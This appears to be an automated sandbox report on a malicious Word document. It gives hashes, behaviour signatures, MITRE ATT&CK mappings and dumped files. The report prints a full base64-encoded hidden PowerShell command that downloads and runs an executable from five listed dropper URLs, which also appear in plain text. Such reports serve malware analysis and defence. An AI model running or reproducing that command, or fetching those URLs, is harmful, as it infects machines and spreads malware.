4f91b31da83fdf884548199c7414242dd73357b3f1b8088ca3ae151c0eee9c96

General

Target

096d4280755ab4578947f3e2c5a79c6c_JaffaCakes118.doc
Size

179KB
MD5

096d4280755ab4578947f3e2c5a79c6c
SHA1

71d409c21ed694500052c68b736d813f9bde4181
SHA256

4f91b31da83fdf884548199c7414242dd73357b3f1b8088ca3ae151c0eee9c96
SHA512

f01f10f45ec79d349ecd7bf1a63d60179ee2c21fa13134b0c93f1d1a08c7e773fef92da9bdab10c8f3c2969a975bc81295c32ef96e01cf6aa300a2f2385648bb
SSDEEP

3072:N02y/GdynktGDWLS0HZWD5w8K7Nk9uD7IBUx1m8tbgD6PhOUOnE:N02k4ntGiL3HJk9uD7bW8tbgD65O9E

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://kaikeline.com/1B/

exe.dropper

http://irpot.com/css/jRk5gg/

exe.dropper

http://kartcup.net/picture_library/eqop/

exe.dropper

http://lakelass.com/cgi-bin/2dhm/

exe.dropper

http://ouimet.biz/cgi-bin/l/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4568	244	Powershell.exe	82

Blocklisted process makes network request 6 IoCs

flow	pid	Process
14	4568	Powershell.exe
22	4568	Powershell.exe
23	4568	Powershell.exe
29	4568	Powershell.exe
30	4568	Powershell.exe
34	4568	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5056	WINWORD.EXE
5056	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4568	Powershell.exe
4568	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4568	Powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5056	WINWORD.EXE
5056	WINWORD.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5056 wrote to memory of 1368	5056	WINWORD.EXE	87
PID 5056 wrote to memory of 1368	5056	WINWORD.EXE	87

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\096d4280755ab4578947f3e2c5a79c6c_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABKAGQAZwB5AHQAbABnAHEAbgB0AHUAPQAnAFcAaABiAGsAYwB6AGEAaQBxAHIAZwBuACcAOwAkAE8AYwB3AHkAcAB5AGQAeABtAGoAagBnAGUAIAA9ACAAJwAxADYAJwA7ACQAWQBrAG4AdABkAGoAbwBpAHQAcAA9ACcASABsAGoAZQB2AGcAaQBhAGYAaAAnADsAJABUAHUAeQBjAHgAeABsAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBjAHcAeQBwAHkAZAB4AG0AagBqAGcAZQArACcALgBlAHgAZQAnADsAJABGAHkAZgBzAG0AegBsAHQAPQAnAFMAZABmAGEAbwBsAGkAeQBpAHYAbgBuACcAOwAkAFUAYgBkAGwAaQB0AHcAcwBnAGwAaABzAGMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBlAGIAYwBMAGkARQBOAHQAOwAkAFgAcwBjAGsAeAB5AGcAegBoAG4AcwB1AHMAPQAnAGgAdAB0AHAAOgAvAC8AawBhAGkAawBlAGwAaQBuAGUALgBjAG8AbQAvADEAQgAvACoAaAB0AHQAcAA6AC8ALwBpAHIAcABvAHQALgBjAG8AbQAvAGMAcwBzAC8AagBSAGsANQBnAGcALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAdABjAHUAcAAuAG4AZQB0AC8AcABpAGMAdAB1AHIAZQBfAGwAaQBiAHIAYQByAHkALwBlAHEAbwBwAC8AKgBoAHQAdABwADoALwAvAGwAYQBrAGUAbABhAHMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADIAZABoAG0ALwAqAGgAdAB0AHAAOgAvAC8AbwB1AGkAbQBlAHQALgBiAGkAegAvAGMAZwBpAC0AYgBpAG4ALwBsAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAbQBrAGcAcgBvAGgAcQBsAGoAbwBmAGUAPQAnAFUAZAB2AHAAbgB0AGcAegB1AHIAeAByAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAeQBsAHgAcABrAG4AcAB3AGwAZQBtACAAaQBuACAAJABYAHMAYwBrAHgAeQBnAHoAaABuAHMAdQBzACkAewB0AHIAeQB7ACQAVQBiAGQAbABpAHQAdwBzAGcAbABoAHMAYwAuACIARABgAG8AYAB3AE4ATABvAEEAZABGAGAASQBMAGUAIgAoACQAQgB5AGwAeABwAGsAbgBwAHcAbABlAG0ALAAgACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAUQByAGUAaABsAGEAbwBlAD0AJwBNAGIAcgB3AG0AagBnAG4AYwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFQAdQB5AGMAeAB4AGwAegBuACkALgAiAGwARQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwA4ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAWQBnAGQAYQBtAHEAbwB1AHcAYQBxAGkAPQAnAEEAdwBqAHcAZgB6AHQAZwBhAHIAcABjAGgAJwA7AGIAcgBlAGEAawA7ACQARABlAGwAbAB5AHQAeABlAGsAbgB5AD0AJwBMAG0AawBpAGMAcQBpAGoAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHkAcgBnAG0AbABrAGkAZwBkAD0AJwBGAHgAdgBjAGMAcwB5AGoAZwBqAGwAdgBvACcA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EDBE6AEB.wmf

Filesize
444B

MD5
34187bcdddcdb28f5a3e6f8de61df500

SHA1
2c9ff5f727cdaaf72d444e1d0809c13144c7fb22

SHA256
a1a0bcc48b57ca8bfa8ecbf5d9cfc635b1402cc13d8a5bc4e1ebb3a33f8b9af8

SHA512
53394dad7729d9d0e4dc25b9819c6660cb64b9d91ecebc15a60afd80f121c0d08567de780787d02b599dbf9694bace1b8594fb238be4884dd183183b3cedfcc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD9714.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvhzvk2m.pgw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4568-56-0x00000198121A0000-0x00000198121C2000-memory.dmp

Filesize
136KB

Download
memory/5056-7-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-16-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-6-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-0-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-8-0x00007FFBFDEA0000-0x00007FFBFDEB0000-memory.dmp

Filesize
64KB

Download
memory/5056-9-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-10-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-13-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-12-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-11-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-14-0x00007FFBFDEA0000-0x00007FFBFDEB0000-memory.dmp

Filesize
64KB

Download
memory/5056-15-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-17-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-5-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-18-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-19-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-4-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-3-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-1-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-2-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-546-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download
memory/5056-569-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-570-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-571-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-572-0x00007FFC00010000-0x00007FFC00020000-memory.dmp

Filesize
64KB

Download
memory/5056-573-0x00007FFC3FF90000-0x00007FFC40185000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads